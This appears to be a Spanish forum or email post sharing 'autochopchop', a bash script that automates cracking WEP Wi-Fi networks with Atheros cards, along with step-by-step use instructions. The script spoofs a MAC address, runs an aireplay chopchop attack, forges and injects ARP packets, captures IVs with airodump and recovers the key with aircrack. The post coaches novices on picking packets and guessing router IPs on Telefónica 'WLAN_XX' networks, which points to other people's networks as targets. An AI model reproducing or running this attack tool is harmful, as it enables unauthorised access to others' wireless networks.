Gente:

Os adjunto el script + instrucciones. Recuerda que mi script solo trabaja con tarjetas de chipset atheros (informate de cuales son)

pasos a seguir:

te bajas la troppix y la grabas a cd

metes en un pendrive el script adjunto (fichero autochopchop, sin extension)

para preparar el script y pasarlo a ram etc:

metes el cd de la troppix y arrancas con el pendrive pinchado.

luego, para preparar el script, abres un console y ¡a teclear!

    cd /mnt/sda1
    cp /mnt/sda1/autochopchop /usr/bin
    chmod 777 /usr/bin/autochopchop


NOTA: "sda1" puede variar en funcion del particionado de tu pendrive. investiga por tu cuenta como acceder a el.

luego:

    comandos para buscar redes al alcance:

    ifconfig ath0 up
    iwlist ath0 scan


o bien si ya no eres novato usa kismet y memoriza el essid.


    Comando para empezar el ataque:

    autochopchop nombredelawifi

    y seguir instrucciones en pantalla.


problemas mas graves que se le plantean a un novato:

- elegir el paquete a desencriptar, de las infinitas opciones que muestra aireplay

Cuando aparezca una oferta de aireplay mostrando un candidato de paquete que se pueda desencriptar, verificar que la MAC de origen del paquete cazado NO SEA 1:2:3:4:5 (esa sera nuestra mac falsa mientras usemos el script), el resto de criterios prácticamente nos valen todos, pero es preferible que la source mac y el bssid encajen (ese paquete seguramente procede directo del router wifi).

- elegir la ip de destino a la que enviar el arp forjado

como los routers de telefonica siempre son 192.168.1.1, 95% que aciertas con esa opcion. si la ip que hemos auditado con el paquete cazado es 192.168.1.33, tambien podemos elegir la ip de destino 192.168.1.1 porque tiene toda la pinta de que se trata de un router de telefonica con un cliente asignado por dhcp (la primera ip que da el servidor dhcp de los routers de telefonica es 192.168.1.33).

otra pista: en las redes de nombre WLAN_XX podeis elegir 192.168.1.1 a ciegas, que acertais fijo.

para cualquier cosa podeis consultarme por email pero mis tiempos de respuesta son algo elevados porque robotics no me deja tiempo para más

un saludo, nos vemos en la conferencia de hacking wireless de valencia jeje

Alex Amo

#!/bin/bash
#
# Autochopchop lite v1.0
#
# Script para realizar ataques chopchop automaticos sobre redes inalámbricas WEP:
#
# * Mediante tarjetas WIFI con chipset atheros (p. ej. NETGEAR WG511T)
# * Usando el modo híbrido MANAGED/RAW de las mismas (driver parcheado a tal efecto)
#   para realizar una auntenticación VERDADERA en lugar de enviar constantemente una simulada.
#
# Autor: Alist3r
#
# Uso:
# autochopchop ESSID
#
# Donde ESSID es el nombre de la red que queremos descifrar.
#
# VARIABLES CONFIGURABLES:
# Pues eso. Variables configurables por el usuario.
#
# MIMAC: mac falsa que adoptara la tarjeta wifi para realizar el ataque.
mimac="00:11:22:33:44:55"
#
# ATH interfaz con la que vamos a trabajar (normalmente ath0)
ath=ath0
#
# OTRAS VARIABLES
# Normalmente no será necesario tocar estas variables.
#
# ATHRAW : esto lo asigna el kernel. Si por ejemplo nuestra interfaz es ath0
# la interfaz RAW asociada a nuestra tarjeta sera ath0raw.
#
athraw=$ath"raw"
#
# SPEED: Velocidad de inyeccion de paquetes por sec.. 600 es lo aconsejado.
speed="600"
#
# FAKEIP: IP falsa que vamos a usar como IP de origen de la que proviene
# el ARP forjado. No tiene mucha importancia cambiarla.
fakeip="1.2.3.4"
#
# ** INICIO DEL SCRIPT **
#
# Comprobamos que se nos ha pasado el ESSID de la red que queremos descifrar. En caso contrario, salir

if [ $# -eq 0 ]
 then
 echo "Numero de argumentos insuficientes"
 echo "Uso: $0 ESSID"
 exit
fi

# INICIALIZACION
# NOTA: Estos comandos de abajo van bien y no creo que deban tocarse mucho.

echo Iniciando dispositivos... $ath - $athraw

sysctl -w dev.$ath.rawdev=1
ifconfig $athraw up

ifconfig $ath down # por si acaso, antes de cambiar la mac
ifconfig $ath hw ether $mimac
iwpriv $ath mode 2
iwconfig $ath mode managed essid "$1" channel 0 key AAAAAAAAAA rate 1M ap off

ifconfig $athraw up
ifconfig $ath up
echo Intentando asociar a la red $1...
sleep 3

iwconfigdat=$(iwconfig $ath)

echo Comprobando asociacion...

# Sacamos datos: bssid de la red...
bssid=$(echo $iwconfigdat |  cut -d":" -f5,6,7,8,9,10 | cut -d " " -f2)

# Aprovechamos para parar si parece que no estamos asociados a ninguna red.

if [ $bssid == "00:00:00:00:00:00" ];
then
  echo No ha asociado a ningun AP.
  echo Comprueba el nombre de la red y la distancia e intentalo de nuevo.
  echo
  exit
fi

# Sacamos mas datos: canal...
channelfreq=$(echo $iwconfigdat | cut -d":" -f4 | cut -d" " -f1)
case $channelfreq in

2.412)
channel=1;;

2.417)
channel=2;;

2.422)
channel=3;;

2.427)
channel=4;;

2.432)
channel=5;;

2.437)
channel=6;;

2.442)
channel=7;;

2.447)
channel=8;;

2.452)
channel=9;;

2.457)
channel=10;;

2.462)
channel=11;;

esac

echo Asociado correctamente a $1
echo BSSID: $bssid canal $channel
sleep 1
echo Purgando archivos antiguos...
sleep 1

if [ -e replay_dec-*.cap ]; then rm replay_dec-*.cap; fi

if [ -e replay_dec-*.xor ]; then rm replay_dec-*.xor; fi

if [ -e vectores_debiles*.ivs ]; then rm vectores_debiles*.ivs; fi

if [ -e vectores_debiles*.txt ]; then rm vectores_debiles*.txt; fi

echo Iniciando ataque...
sleep 1

aireplay -4 -h $mimac -b $bssid $ath
status=$?

if [ $status != 0 ];
then
   echo Aireplay ha devuelto un status "$?"
        echo Detengo el script porque creo que el ataque chopchop ha fallado...
   echo Intentalo de nuevo.   
   exit
fi

# si aireplay no ha fallado analizaremos el fichero cap que ha generado para sacar ip's

tcpdump -s 0 -n -e -r $( ls replay_dec-*.cap )

echo ---------------------------------------------------------------
echo Arriba aparece informacion sobre el paquete cazado de la red.
echo en ella se veran una o dos direcciones ip validas para enviar ARP.
read -p "A que ip se va a enviar ARP?:" ipdest

# forjar el paquete arp que inyectaremos a la ip que diga el usuario
echo Forjando ARP para enviar a $ipdest...

arpforge $( ls replay_dec-*.xor ) 1 $bssid $mimac $fakeip $ipdest forged_arp.cap


echo Arp forjado. Responde "Y" a "USE THIS PACKET?" en la ventana emergente que aparecera a continuacion.
echo Pulsa enter para comenzar...
read

# Lanzar dos terminales, uno inyectando el arp; otro escuchando las respuestas del router

xterm -e airodump $ath vectores_debiles $channel 1 &

xterm -e aireplay -2 -r forged_arp.cap -x $speed $ath &

# Y al rato de inyectar empieza aircrack a procesar datos para decodificar la red...
echo Inyeccion en curso, preparando aircrack para descodificacion en 20 secs...
sleep 20
aircrack $( ls vectores_debiles*.ivs )